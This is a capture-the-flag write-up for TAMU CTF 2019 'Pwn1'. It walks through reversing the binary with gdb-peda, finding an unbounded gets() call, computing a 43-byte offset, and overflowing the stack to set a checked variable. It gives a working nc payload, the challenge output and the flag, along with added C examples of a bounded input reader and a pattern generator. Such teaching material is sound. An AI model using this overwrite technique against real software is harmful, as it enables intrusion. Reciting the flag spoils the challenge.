TAMU CTF 2019 Writeups


Pwn1

Challenge Link: nc pwn.tamuctf.com 4321
Difficulty: easy
Binary Link:

This was an easy challenge.
First I downloaded the binary and ran it locally.
output:

root@cbm-guru:/home/root/pracCtf/tamuctf# ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
somename
I don't know that! Auuuuuuuugh!

It asked for a name, which I didn't know, so I gave an arbitrary input, and it returned the "I don't know that!" message.

I then ran strings on the binary to list all the printable strings it contains.
output:

root@cbm-guru:/home/root/pracCtf/tamuctf# strings ./pwn1
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
exit
fopen
puts
putchar
stdin
fgets
stdout
__cxa_finalize
setvbuf
_IO_getc
strcmp
__libc_start_main
GLIBC_2.1
GLIBC_2.1.3
GLIBC_2.0
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
Right. Off you go.
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?
;*2$"
GCC: (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7281
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
over_write_var.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strcmp@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
fgets@@GLIBC_2.0
_edata
_IO_getc@@GLIBC_2.0
__x86.get_pc_thunk.dx
__cxa_finalize@@GLIBC_2.1.3
__data_start
puts@@GLIBC_2.0
__gmon_start__
exit@@GLIBC_2.0
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
stdin@@GLIBC_2.0
setvbuf@@GLIBC_2.0
fopen@@GLIBC_2.1
putchar@@GLIBC_2.0
_fp_hw
stdout@@GLIBC_2.0
__bss_start
main
print_flag
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment


As you can see, there were some interesting strings in the output:
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?


So I ran the binary again, this time using these strings as the answers.

root@cbm-guru:/home/root/pracCtf/tamuctf# ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
i don't know

I don't know that! Auuuuuuuugh!

So it seems we don't have the answer to the third question.
Time to fire up gdb and see what is going on. I opened the binary in gdb (with the peda extension) and listed its functions:

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x000004d4 _init
0x00000510 strcmp@plt
0x00000520 gets@plt
0x00000530 fgets@plt
0x00000540 _IO_getc@plt
0x00000550 puts@plt
0x00000560 exit@plt
0x00000570 __libc_start_main@plt
0x00000580 setvbuf@plt
0x00000590 fopen@plt
0x000005a0 putchar@plt
0x000005b0 __cxa_finalize@plt
0x000005b8 __gmon_start__@plt
0x000005c0 _start
0x00000600 __x86.get_pc_thunk.bx
0x00000610 deregister_tm_clones
0x00000650 register_tm_clones
0x000006a0 __do_global_dtors_aux
0x000006f0 frame_dummy
0x000006f9 __x86.get_pc_thunk.dx
0x000006fd print_flag
0x00000779 main
0x000008f0 __libc_csu_init
0x00000950 __libc_csu_fini
0x00000954 _fini

info functions tells me there is a main function, a print_flag function, and many others which I just ignored.

I then got the disassembly of main:

gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000779 <+0>: lea ecx,[esp+0x4]
0x0000077d <+4>: and esp,0xfffffff0
0x00000780 <+7>: push DWORD PTR [ecx-0x4]
0x00000783 <+10>: push ebp
0x00000784 <+11>: mov ebp,esp
0x00000786 <+13>: push ebx
0x00000787 <+14>: push ecx
0x00000788 <+15>: sub esp,0x40
0x0000078b <+18>: call 0x600 <__x86.get_pc_thunk.bx>
0x00000790 <+23>: add ebx,0x1820
0x00000796 <+29>: mov eax,DWORD PTR [ebx+0x44]
0x0000079c <+35>: mov eax,DWORD PTR [eax]
0x0000079e <+37>: push 0x0
0x000007a0 <+39>: push 0x0
0x000007a2 <+41>: push 0x2
0x000007a4 <+43>: push eax
0x000007a5 <+44>: call 0x580 <setvbuf@plt>
0x000007aa <+49>: add esp,0x10
0x000007ad <+52>: mov DWORD PTR [ebp-0xc],0x2
0x000007b4 <+59>: mov DWORD PTR [ebp-0x10],0x0
0x000007bb <+66>: sub esp,0xc
0x000007be <+69>: lea eax,[ebx-0x1620]
0x000007c4 <+75>: push eax
0x000007c5 <+76>: call 0x550 <puts@plt>
0x000007ca <+81>: add esp,0x10
0x000007cd <+84>: sub esp,0xc
0x000007d0 <+87>: lea eax,[ebx-0x15b5]
0x000007d6 <+93>: push eax
0x000007d7 <+94>: call 0x550 <puts@plt>
0x000007dc <+99>: add esp,0x10
0x000007df <+102>: mov eax,DWORD PTR [ebx+0x40]
0x000007e5 <+108>: mov eax,DWORD PTR [eax]
0x000007e7 <+110>: sub esp,0x4
0x000007ea <+113>: push eax
0x000007eb <+114>: push 0x2b
0x000007ed <+116>: lea eax,[ebp-0x3b]
0x000007f0 <+119>: push eax
0x000007f1 <+120>: call 0x530 <fgets@plt>
0x000007f6 <+125>: add esp,0x10
0x000007f9 <+128>: sub esp,0x8
0x000007fc <+131>: lea eax,[ebx-0x159f]
0x00000802 <+137>: push eax
0x00000803 <+138>: lea eax,[ebp-0x3b]
0x00000806 <+141>: push eax
0x00000807 <+142>: call 0x510 <strcmp@plt>
0x0000080c <+147>: add esp,0x10
0x0000080f <+150>: test eax,eax
0x00000811 <+152>: je 0x82f <main+182>
0x00000813 <+154>: sub esp,0xc
0x00000816 <+157>: lea eax,[ebx-0x1584]
0x0000081c <+163>: push eax
0x0000081d <+164>: call 0x550 <puts@plt>
0x00000822 <+169>: add esp,0x10
0x00000825 <+172>: sub esp,0xc
0x00000828 <+175>: push 0x0
0x0000082a <+177>: call 0x560 <exit@plt>
0x0000082f <+182>: sub esp,0xc
0x00000832 <+185>: lea eax,[ebx-0x1564]
0x00000838 <+191>: push eax
0x00000839 <+192>: call 0x550 <puts@plt>
0x0000083e <+197>: add esp,0x10
0x00000841 <+200>: mov eax,DWORD PTR [ebx+0x40]
0x00000847 <+206>: mov eax,DWORD PTR [eax]
0x00000849 <+208>: sub esp,0x4
0x0000084c <+211>: push eax
0x0000084d <+212>: push 0x2b
0x0000084f <+214>: lea eax,[ebp-0x3b]
0x00000852 <+217>: push eax
0x00000853 <+218>: call 0x530 <fgets@plt>
0x00000858 <+223>: add esp,0x10
0x0000085b <+226>: sub esp,0x8
0x0000085e <+229>: lea eax,[ebx-0x154d]
0x00000864 <+235>: push eax
0x00000865 <+236>: lea eax,[ebp-0x3b]
0x00000868 <+239>: push eax
0x00000869 <+240>: call 0x510 <strcmp@plt>
0x0000086e <+245>: add esp,0x10
0x00000871 <+248>: test eax,eax
0x00000873 <+250>: je 0x891 <main+280>
0x00000875 <+252>: sub esp,0xc
0x00000878 <+255>: lea eax,[ebx-0x1584]
0x0000087e <+261>: push eax
0x0000087f <+262>: call 0x550 <puts@plt>
0x00000884 <+267>: add esp,0x10
0x00000887 <+270>: sub esp,0xc
0x0000088a <+273>: push 0x0
0x0000088c <+275>: call 0x560 <exit@plt>
0x00000891 <+280>: sub esp,0xc
0x00000894 <+283>: lea eax,[ebx-0x1534]
0x0000089a <+289>: push eax
0x0000089b <+290>: call 0x550 <puts@plt>
0x000008a0 <+295>: add esp,0x10
0x000008a3 <+298>: sub esp,0xc
0x000008a6 <+301>: lea eax,[ebp-0x3b]
0x000008a9 <+304>: push eax
0x000008aa <+305>: call 0x520 <gets@plt>
0x000008af <+310>: add esp,0x10
0x000008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8
0x000008b9 <+320>: jne 0x8c2 <main+329>
0x000008bb <+322>: call 0x6fd <print_flag>
0x000008c0 <+327>: jmp 0x8d4 <main+347>
0x000008c2 <+329>: sub esp,0xc
0x000008c5 <+332>: lea eax,[ebx-0x1584]
0x000008cb <+338>: push eax
0x000008cc <+339>: call 0x550 <puts@plt>
0x000008d1 <+344>: add esp,0x10
0x000008d4 <+347>: mov eax,0x0
0x000008d9 <+352>: lea esp,[ebp-0x8]
0x000008dc <+355>: pop ecx
0x000008dd <+356>: pop ebx
0x000008de <+357>: pop ebp
0x000008df <+358>: lea esp,[ecx-0x4]
0x000008e2 <+361>: ret
End of assembler dump.


There is a lot of assembly, but the important points are these. At main+305 (0x000008aa <+305>: call 0x520 <gets@plt>) there is a call to gets(), and this is where the program reads the answer to the third question. gets() has no length limit, so it is vulnerable to buffer overflow. Compare this with the first two answers: they are read with fgets() into the buffer at ebp-0x3b with a size of 0x2b (43) bytes, and since 0x3b - 0x2b = 0x10, that bounded read stops exactly at ebp-0x10; gets() writes into the same buffer with no such bound.
Also at main+313 (0x000008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8) the local variable at ebp-0x10 is compared with 0xdea110c8; if they are equal, print_flag is called, and print_flag simply reads flag.txt and prints its contents, which is what we want to see.
If you analyse the disassembly of main you find that ebp-0x10 is written only once, at main+59 (0x000007b4 <+59>: mov DWORD PTR [ebp-0x10],0x0), where 0 is stored in it... but it is then compared with the non-zero value 0xdea110c8.
So the compare at main+313 is always false, and we have to alter it using the buffer overflow.

Basically we have to overwrite ebp-0x10 with 0xdea110c8 so that the cmp at main+313 succeeds and print_flag gets called.
How do we do that?
By overflowing the buffer when giving the answer to the third question:
first find the exact offset after which ebp-0x10 is overwritten, then write 0xdea110c8 at that position.
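The defect here is the unbounded gets() at main+305 next to two bounded fgets() calls on the same 43-byte buffer. As an added example (my own code, not the challenge binary's source), the C below rebuilds that frame layout, a 43-byte answer buffer immediately followed by the 4-byte variable the binary checks, and reads the third answer with a bounded reader that reports and drains over-long lines instead of letting them run into the variable. The buffer size 0x2b, the ebp-0x3b/ebp-0x10 offsets and the zero stored at main+59 come from the disassembly above; the helper names (read_answer, secret_intact_after_read, input_from) and the sample inputs are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size the binary passes to its two fgets calls (push 0x2b). */
#define ANSWER_CAP 0x2b

/* Result codes for read_answer(). */
enum { ANSWER_OK = 0, ANSWER_TOO_LONG = -1, ANSWER_EOF = -2 };

/* Bounded replacement for the gets() call at main+305. Reads one line into
 * buf (capacity cap), strips the trailing newline and reports whether the
 * line fit. When it did not, the rest of the line is consumed so it cannot
 * spill into the next prompt. Nothing beyond buf[cap-1] is ever written. */
int read_answer(char *buf, size_t cap, FILE *in)
{
    if (cap == 0) return ANSWER_TOO_LONG;
    if (fgets(buf, (int)cap, in) == NULL) {
        buf[0] = '\0';
        return ANSWER_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return ANSWER_OK;
    }
    /* No newline stored: the line was exactly cap-1 characters long, ended at
     * EOF, or was too long. Peek one character to tell these apart. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return ANSWER_OK;
    while (c != '\n' && c != EOF) c = fgetc(in);   /* drain the excess */
    return ANSWER_TOO_LONG;
}

/* Mirrors the frame main() builds: a 43-byte answer buffer at ebp-0x3b with
 * the 4-byte variable checked at main+313 directly after it at ebp-0x10.
 * Reads the third answer with read_answer() and returns 1 if the variable
 * still holds the zero stored at main+59, 0 if it was clobbered. */
int secret_intact_after_read(FILE *in, int *status)
{
    static const unsigned char zero[4] = {0, 0, 0, 0};
    struct {
        char answer[ANSWER_CAP];   /* ebp-0x3b .. ebp-0x11 */
        unsigned char var[4];      /* ebp-0x10 .. ebp-0x0d; char arrays, so no padding between */
    } frame;
    memset(frame.var, 0, sizeof frame.var);   /* main+59: mov [ebp-0x10], 0 */
    *status = read_answer(frame.answer, sizeof frame.answer, in);
    return memcmp(frame.var, zero, sizeof zero) == 0;
}

/* Wraps constructed sample input in a temporary stream (ISO C tmpfile) so the
 * example runs offline without a terminal. The caller fclose()s the result. */
FILE *input_from(const char *data, size_t len)
{
    FILE *f = tmpfile();
    if (f == NULL) return NULL;
    fwrite(data, 1, len, f);
    rewind(f);
    return f;
}

int main(void)
{
    char line[ANSWER_CAP];
    int status = 0;

    /* A normal answer fits and comes back without its newline. */
    FILE *ok = input_from("To seek the Holy Grail.\n", 24);
    read_answer(line, sizeof line, ok);
    printf("answer: \"%s\"\n", line);
    fclose(ok);

    /* The 100-byte pattern from the writeup reaches ebp-0x10 through gets();
     * through read_answer() it is cut at 42 bytes and the variable survives. */
    char long_input[120];
    memset(long_input, 'A', 100);
    memcpy(long_input + 100, "\nnext\n", 6);
    FILE *over = input_from(long_input, 106);
    int intact = secret_intact_after_read(over, &status);
    printf("variable intact: %d, status: %d\n", intact, status);
    read_answer(line, sizeof line, over);
    printf("next line read cleanly: \"%s\"\n", line);
    fclose(over);
    return 0;
}
```

The drain loop matters as much as the bound: if the excess were left in stdin, it would be handed to the next prompt and could silently answer it. Note also that the bounded version only fixes the overflow; with the compare at main+313 still testing a value that is never set, print_flag stays unreachable, which is presumably the intended design of the challenge.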

Step one: finding the offset.
Create a non-repeating pattern of 100 bytes using gdb-peda and store it in pat.txt:

gdb-peda$ pattern_create 100 pat.txt
Writing pattern of 100 chars to filename "pat.txt"

Then feed this pattern as the answer to the third question:

gdb-peda$ r
Starting program: /home/root/pracCtf/tamuctf/pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
I don't know that! Auuuuuuuugh!

Program received signal SIGSEGV, Segmentation fault.


The program segfaults, as I expected.

Now let's see what is in EBP:

gdb-peda$ i r
eax 0x0 0x0
ecx 0x47414131 0x47414131
edx 0x20 0x20
ebx 0x41634141 0x41634141
esp 0x4741412d 0x4741412d
ebp 0x41413241 0x41413241
esi 0xf7f93000 0xf7f93000
edi 0xf7f93000 0xf7f93000
eip 0x565558e2 0x565558e2 <main+361>
eflags 0x10282 [ SF IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63

As you can see, ebp contains 0x41413241, which is a piece of the pattern from pat.txt... so let's find the offset:

gdb-peda$ pattern_offset 0x41413241
1094791745 found at offset: 59

As you can see, the offset of ebp is 59. That means the 4 characters after the first 59 go into ebp (the saved ebp that main's epilogue pops).
Now we need the offset of ebp-0x10, so subtract 0x10 from 59, i.e. 59 - 16 (0x10 = 16) = 43.

So the 4 chars after 43 chars go straight to ebp-0x10. Now guess what: we send the required value to ebp-0x10 to get the flag.
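To show why pattern_offset can turn a register value into an offset at all, here is an added example (my own code, not part of the writeup or of gdb-peda) that reimplements what pattern_create and pattern_offset do: the pattern is a de Bruijn sequence of order 3 over peda's mixed charset, so every short window of it occurs exactly once, and the 4 bytes found in ebp pin down a single position. The charset construction is my reading of peda's defaults, made so the output matches the 100-character pattern shown above; it is an assumption about the tool, not taken from the page. The function names pattern_create and pattern_offset mirror the peda commands but are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHARSET_MAX 128
#define SUBSEQ_LEN 3   /* peda builds its pattern from a de Bruijn sequence of order 3 */

/* Builds gdb-peda's default mixed charset by taking one character in turn
 * from its three groups. The group contents (symbols "%$-;" placed before the
 * lowercase letters, 's' and 'n' placed before the digits) are an assumption
 * about peda's defaults, chosen to reproduce the pattern in the writeup.
 * Returns the number of characters written. */
static size_t build_charset(char *out, size_t cap)
{
    const char *groups[3] = {
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
        "%$-;abcdefghijklmopqrtuvwxyz",
        "sn()0123456789",
    };
    size_t n = 0;
    for (size_t k = 0; ; k++) {
        int added = 0;
        for (int g = 0; g < 3; g++) {
            if (k < strlen(groups[g]) && n + 1 < cap) {
                out[n++] = groups[g][k];
                added = 1;
            }
        }
        if (!added) break;
    }
    out[n] = '\0';
    return n;
}

/* State for the recursive de Bruijn generator (the FKM algorithm peda uses). */
struct db_state {
    const char *alphabet;
    int k;                    /* alphabet size */
    int a[SUBSEQ_LEN + 1];    /* current word, 1-based */
    char *out;
    size_t len, cap;          /* chars emitted so far, chars wanted */
};

static void db(struct db_state *s, int t, int p)
{
    if (s->len >= s->cap) return;                     /* pattern is long enough */
    if (t > SUBSEQ_LEN) {
        if (SUBSEQ_LEN % p == 0)
            for (int j = 1; j <= p && s->len < s->cap; j++)
                s->out[s->len++] = s->alphabet[s->a[j]];
    } else {
        s->a[t] = s->a[t - p];
        db(s, t + 1, p);
        for (int j = s->a[t - p] + 1; j < s->k; j++) {
            s->a[t] = j;
            db(s, t + 1, t);
        }
    }
}

/* Equivalent of "pattern_create SIZE": writes SIZE pattern characters plus a
 * terminating NUL into out (which must hold SIZE + 1 bytes). Every window of
 * 3 or more characters is unique, which is what makes the offset lookup work. */
size_t pattern_create(char *out, size_t size)
{
    char charset[CHARSET_MAX];
    struct db_state s = {0};
    s.alphabet = charset;
    s.k = (int)build_charset(charset, sizeof charset);
    s.out = out;
    s.cap = size;
    db(&s, 1, 1);
    out[s.len] = '\0';
    return s.len;
}

/* Equivalent of "pattern_offset VALUE": interprets value as the 4 bytes seen in
 * a register (little-endian, as on x86) and returns their position in the
 * pattern, or -1 if those bytes do not occur in it. */
long pattern_offset(const char *pattern, uint32_t value)
{
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((value >> (8 * i)) & 0xff);
    needle[4] = '\0';
    if (strlen(needle) != 4) return -1;   /* a NUL byte can never come from the pattern */
    const char *hit = strstr(pattern, needle);
    return hit ? (long)(hit - pattern) : -1;
}

int main(void)
{
    char pat[101];
    pattern_create(pat, 100);
    printf("%s\n", pat);
    long ebp_off = pattern_offset(pat, 0x41413241u);
    printf("0x41413241 found at offset: %ld\n", ebp_off);
    /* ebp-0x10 lies 16 bytes below the saved ebp; 0x3b - 0x10 from the buffer start must agree */
    printf("offset of ebp-0x10: %ld (frame check: %d)\n", ebp_off - 0x10, 0x3b - 0x10);
    return 0;
}
```

The frame check in main is the cross-check worth doing before trusting a pattern result: the buffer starts at ebp-0x3b, so the variable at ebp-0x10 must be 0x3b - 0x10 = 43 bytes in, and that agrees with 59 - 16 from the register value. When the two disagree, the register usually holds something other than the slot you think it does.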

So the final payload looks like this (Python 2 syntax for the print):
payload:
python -c "s='Sir Lancelot of Camelot\n'+'To seek the Holy Grail.\n'+'A'*43+'\xc8\x10\xa1\xde';print s" | nc pwn.tamuctf.com 4321

Run this in the terminal and get the flag :-)

root@cbm-guru:/home/root/pracCtf/tamuctf# python -c "s='Sir Lancelot of Camelot\n'+'To seek the Holy Grail.\n'+'A'*43+'\xc8\x10\xa1\xde';print s" | nc pwn.tamuctf.com 4321
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.
gigem{34sy_CC428ECD75A0D392}


The flag was “gigem{34sy_CC428ECD75A0D392}”.



